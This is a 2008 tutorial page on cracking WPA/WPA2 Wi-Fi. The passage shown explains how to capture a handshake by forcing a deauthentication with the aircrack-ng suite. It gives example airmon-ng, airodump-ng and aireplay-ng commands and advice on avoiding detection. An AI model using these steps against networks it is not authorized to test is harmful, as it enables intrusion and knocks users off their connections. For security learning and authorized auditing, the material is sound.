Wireless Wireless How To How To Crack WPA / WPA2 | How To Crack WPA / WPA2 |
|
|
| Brandon Teska | |
| January 15, 2008 | |
Active AttackUsing the information we gathered with Kismet during the recon step, we can target associated clients of a certain AP with forged deauthentication packets, which should cause the client to disassociate from the AP. We then listen for the reassociation and subsequent authentication. This is a little trickier and also detectable, since we're sending out packets. But it's much quicker than waiting for a genuine association (in most cases). After identifying our target AP with associated clients, we need to set up the wireless hardware for packet injection. The aircrack suite has a little bash script to do just that. First bring down the managed VAP (Virtual Access Point) with: airmon-ng stop ath0
Figure 2: Bringing down the managed interfaceNext, start up a VAP in "Monitor" mode: airmon-ng start wifi0
Figure 3: Creating a monitor mode interfaceNow we need to simultaneously deauthenticate a client and capture the resulting reauthentication. Open up two terminal windows. Start airodump-ng in one terminal: General Form: airodump-ng -w capture_file_prefix --channel channel_number interface Example: airodump-ng -w cap --channel 6 ath0
Figure 4: airodump-ng, up and running Note:You can check which interface is in monitor mode by using iwconfig. Next, run the deathentication attack with aireplay-ng in the other terminal: General Form: aireplay-ng --deauth 1 -a MAC_of_AP -c MAC_of_client interface Example: aireplay-ng --deauth 1 -a 00:18:E7:02:4C:E6 -c 00:13:CE:21:54:14 ath0
Figure 5: A successfully sent deathentication packetIf all goes well, the client should be deauthenticated from the AP and will usually reauthenticate. I like to keep the number of deauthentication packets sent to a minimum (one, in this case). This helps keep you under the radar, since programs like Kismet can detect deauthentication floods. If the deauthentication was successful, airodump-ng displays a notification of the captured reauthentication event (boxed in red in Figure 6).
Figure 6: Successful WPA handshake captureTags: Hacking, How To, WiFi, WPA, Related Articles:The Feds can own your WLAN tooWEP Cracking...Reloaded How To Crack WEP - Part 1: Setup & Network Recon How To Crack WEP - Part 2: Performing the Crack WPA Cracked in 15 minutes |
Most Read
- Wireless
- NAS
- LANs
- MM & VoIP
- Security
- Other
- Basics
Over At The Forums
|
New firmware 2.1.0
Your thoughts about QNAP TS-109 II
OpenWRT not working as wireless repeater bridge on Netgear WGR614L
OpenWRT working as wireless client bridge on Netgear WGR614L
DIY or buy used?
|
Slideshows
 |
 |
 |
 |
 |
 |
More |
Win This!
You could win a Trendnet TEW-633GR Wireless N Gigabit Router and two TEW-621PC 300Mbps Wireless N-Draft PC Cards |
The Charts
Wireless Performance Charts: Belkin N+ Wireless Router |
 NAS Performance Charts: Iomega StorCenter ix2 |
| Router Performance Charts: Belkin N+ Wireless Router |
Tags
3G 802.11n Apple Atheros Belkin Buffalo BYOD CES 2007 CES2008 Contest D-Link gigabit Hacking HomePlug How To HP Intel Iomega IPsec LAN Linksys media adapter Media player Microsoft NAS Netgear Network camera open source powerline Qnap RAID router Router reviews security Site stuff Skype Skype phone Slideshow Smart Switch SMC Synology Thecus Trendnet Tutorial UWB VoIP VPN WiFi Wireless Reviews ZyXELTG Daily
|
Windows market share drops to 15-year low Black Friday shopping results not entirely negative Power.com aims to become a one-stop social networking portal |
Get Email Updates
ZWaveWorld
Nokia Plans to Launch Z-Wave Home Control Center in 2009
|
© 2006-2008 Pudai LLC All Rights Reserved. Copyright of all documents
and scripts belonging to this site by Pudai LLC. |
| |||
DNS by |
||||
